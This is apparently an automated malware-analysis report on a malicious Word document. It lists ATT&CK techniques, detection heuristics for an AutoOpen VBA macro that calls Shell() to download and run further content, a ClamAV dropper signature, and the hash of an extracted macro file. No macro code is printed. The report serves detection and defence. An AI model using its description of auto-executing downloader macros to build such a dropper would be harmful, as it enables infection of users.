Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample is a malicious Office document containing VBA macros. A critical heuristic firing indicates the presence of a Shell() call within the VBA code, which is often used to download and execute further malicious content. The ClamAV detection name 'Doc.Dropper.Powload-6665582-0' further supports this dropper functionality. No specific family could be identified, but the technique suggests a macro-based downloader.
Heuristics (7)
- ClamAV: Doc.Dropper.Powload-6665582-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Powload-6665582-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11149 bytes |

SHA-256 (macros.bas): f77cb9416dbe3ad0b1eaf1c96d51d67dfec992a63a7e1a0990e00f1ac1d1e267
Preview script: first 1,000 lines of the extracted script.